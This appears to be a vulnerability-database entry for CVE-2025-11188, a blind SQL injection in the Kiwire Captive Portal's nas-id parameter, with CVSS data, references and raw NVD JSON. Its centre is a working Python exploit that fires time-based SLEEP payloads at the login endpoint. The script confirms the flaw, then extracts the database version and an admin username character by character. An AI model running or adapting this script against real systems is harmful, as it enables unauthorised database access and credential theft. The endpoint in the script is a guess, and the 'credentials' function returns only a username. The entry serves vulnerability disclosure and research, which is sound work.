CVE-2025-11188

Description

The Kiwire Captive Portal contains a blind SQL injection in the nas-id parameter, allowing for SQL commands to be issued and to compromise the corresponding database.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:synchroweb:kiwire:3.6:*:*:*:*:*:*:* - VULNERABLE

Kiwire Captive Portal 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11188 - Kiwire Captive Portal Blind SQL Injection PoC
# Vulnerability: Blind SQL Injection in nas-id parameter
# Author: Security Researcher

import requests
import time

TARGET_URL = "http://target-kiwire-portal.com"
NAS_ID_ENDPOINT = "/cgi-bin/login.cgi"  # Adjust based on actual endpoint

def check_vulnerability(target_url):
    """Check if the target is vulnerable to blind SQL injection"""
    # Normal request
    normal_payload = "valid-nas-id"
    normal_response = requests.post(
        f"{target_url}{NAS_ID_ENDPOINT}",
        data={"nas-id": normal_payload, "username": "test", "password": "test"}
    )
    normal_time = normal_response.elapsed.total_seconds()

    # Time-based blind SQL injection test
    injection_payload = "' OR IF(1=1, SLEEP(5), 0) -- -"
    start_time = time.time()
    inject_response = requests.post(
        f"{target_url}{NAS_ID_ENDPOINT}",
        data={"nas-id": injection_payload, "username": "test", "password": "test"}
    )
    elapsed_time = time.time() - start_time

    if elapsed_time > 4:  # If response delayed by ~5 seconds
        print(f"[+] Target is VULNERABLE to blind SQL injection!")
        print(f"[+] Normal response time: {normal_time:.2f}s")
        print(f"[+] Injection response time: {elapsed_time:.2f}s")
        return True
    else:
        print(f"[-] Target does not appear vulnerable")
        return False


def extract_database_version(target_url):
    """Extract MySQL version using time-based blind SQL injection"""
    version = ""
    for position in range(1, 20):
        for char_code in range(32, 127):
            # Time-based extraction: SUBSTRING(version, position, 1) = char_code
            payload = f"' OR IF(ASCII(SUBSTRING(@@version,{position},1))={char_code}, SLEEP(2), 0) -- -"
            start_time = time.time()
            requests.post(
                f"{target_url}{NAS_ID_ENDPOINT}",
                data={"nas-id": payload}
            )
            elapsed = time.time() - start_time

            if elapsed > 1.5:
                version += chr(char_code)
                print(f"[+] Extracted so far: {version}")
                break
        else:
            break

    return version


def extract_credentials(target_url, table_name="admin"):
    """Extract admin credentials from database"""
    # Example: extract username and password from admin table
    extracted_data = {}

    # Extract first admin username
    username = ""
    for pos in range(1, 50):
        for c in range(32, 127):
            payload = f"' OR IF(ASCII(SUBSTRING((SELECT username FROM {table_name} LIMIT 1),{pos},1))={c}, SLEEP(2), 0) -- -"
            start = time.time()
            requests.post(f"{target_url}{NAS_ID_ENDPOINT}", data={"nas-id": payload})
            if time.time() - start > 1.5:
                username += chr(c)
                break
        else:
            break

    extracted_data["username"] = username
    print(f"[+] Extracted username: {username}")
    return extracted_data


if __name__ == "__main__":
    print(f"[*] Testing {TARGET_URL} for CVE-2025-11188")
    if check_vulnerability(TARGET_URL):
        version = extract_database_version(TARGET_URL)
        print(f"[+] Database version: {version}")
        creds = extract_credentials(TARGET_URL)
        print(f"[+] Extracted credentials: {creds}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11188
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11188
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11188/
[4] VulDB https://vuldb.com/cve/CVE-2025-11188
[5] https://www.synchroweb.com/release-notes/kiwire/security
[6] https://www.kb.cert.org/vuls/id/887923

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11188", "sourceIdentifier": "[email protected]", "published": "2025-10-10T11:15:40.407", "lastModified": "2025-11-14T23:46:44.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Kiwire Captive Portal contains a blind SQL injection in the nas-id parameter, allowing for SQL commands to be issued and to compromise the corresponding database."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synchroweb:kiwire:3.6:*:*:*:*:*:*:*", "matchCriteriaId": "70C4518C-CF80-4EC0-B6AE-3B3A9F78FD6D"}]}]}], "references": [{"url": "https://www.synchroweb.com/release-notes/kiwire/security", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://www.kb.cert.org/vuls/id/887923", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}]}}